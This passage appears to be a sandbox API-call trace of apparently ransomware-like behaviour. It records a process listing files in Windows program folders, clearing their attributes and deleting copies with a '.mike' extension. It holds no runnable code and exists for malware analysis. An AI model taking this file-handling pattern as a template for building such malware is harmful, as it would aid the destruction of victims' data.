lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0101.989] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", dwFileAttributes=0x80) returned 0 [0101.990] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike")) returned 1 [0101.996] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0102.165] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", dwFileAttributes=0x80) returned 0 [0102.167] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike")) returned 1 [0102.172] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0102.377] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt", dwFileAttributes=0x80) returned 0 [0102.378] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt.mike" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextservicesimplifiedzhengma.txt.mike")) returned 1 [0102.384] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0102.394] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt", dwFileAttributes=0x80) returned 0 [0102.395] DeleteFileW (lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\TableTextServiceYi.txt.mike" (normalized: "c:\\program files\\windows nt\\tabletextservice\\tabletextserviceyi.txt.mike")) returned 1 [0102.396] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6505800, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x652b960, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.397] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.397] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46672035, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x46672035, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x449faf50, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x5bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll", cAlternateFileName="")) returned 1 [0102.397] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d933d2, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72d933d2, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x6e10ff3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3f54, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceAmharic.txt", cAlternateFileName="")) returned 1 [0102.397] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a73731, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72a73731, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x6e8340d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x136bf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceArray.txt", cAlternateFileName="")) returned 1 [0102.397] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8340d, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x6e8340d, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x6f1b985, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef486, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceDaYi.txt", cAlternateFileName="")) returned 1 [0102.398] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae5b48, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72ae5b48, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x72ada55, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x196b56, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedQuanPin.txt", cAlternateFileName="")) returned 1 [0102.398] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b57f5f, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72b57f5f, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x736c12b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x160e36, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedShuangPin.txt", cAlternateFileName="")) returned 1 [0102.398] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ba4219, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72ba4219, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x742a801, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1b9fb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceSimplifiedZhengMa.txt", cAlternateFileName="")) returned 1 [0102.398] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d6d275, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72d6d275, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x742a801, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xafa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceYi.txt", cAlternateFileName="")) returned 1 [0102.398] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d6d275, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0x72d6d275, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x742a801, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xafa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextServiceYi.txt", cAlternateFileName="")) returned 0 [0102.398] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.399] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.399] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.399] CoTaskMemFree (pv=0x506980) [0102.399] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.400] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa260c65, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa260c65, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll.mui", cAlternateFileName="")) returned 1 [0102.400] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.400] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.400] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.400] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa260c65, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa260c65, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll.mui", cAlternateFileName="")) returned 1 [0102.401] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa260c65, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa260c65, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll.mui", cAlternateFileName="")) returned 0 [0102.401] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.401] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.401] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.401] CoTaskMemFree (pv=0x506980) [0102.402] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.403] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.403] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.403] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea0f40f, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8ea0f40f, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x85cc42cd, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x16f18, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe", cAlternateFileName="")) returned 1 [0102.403] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1054327, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1054327, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1184e2a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x25e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingEngine.dll", cAlternateFileName="")) returned 1 [0102.403] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb102e1c7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb102e1c7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1054327, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll", cAlternateFileName="")) returned 1 [0102.404] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b623846, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8b623846, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x43a82ff0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoBase.dll", cAlternateFileName="")) returned 1 [0102.404] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb121d3ab, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb121d3ab, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb13c02ce, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1a5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll", cAlternateFileName="")) returned 1 [0102.404] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.404] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.405] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.406] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.406] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0102.407] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea0f40f, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8ea0f40f, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x85cc42cd, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x16f18, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe", cAlternateFileName="")) returned 1 [0102.407] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1054327, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1054327, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1184e2a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x25e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingEngine.dll", cAlternateFileName="")) returned 1 [0102.407] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb102e1c7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb102e1c7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1054327, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll", cAlternateFileName="")) returned 1 [0102.407] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b623846, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8b623846, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x43a82ff0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoBase.dll", cAlternateFileName="")) returned 1 [0102.407] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb121d3ab, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb121d3ab, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb13c02ce, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1a5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll", cAlternateFileName="")) returned 1 [0102.408] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb121d3ab, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb121d3ab, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb13c02ce, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1a5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll", cAlternateFileName="")) returned 0 [0102.408] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0102.408] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0102.408] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0102.409] CoTaskMemFree (pv=0x506980) [0102.409] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0102.410] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.410] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe.mui", cAlternateFileName="")) returned 1 [0102.410] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll.mui", cAlternateFileName="")) returned 1 [0102.410] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 1 [0102.411] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, 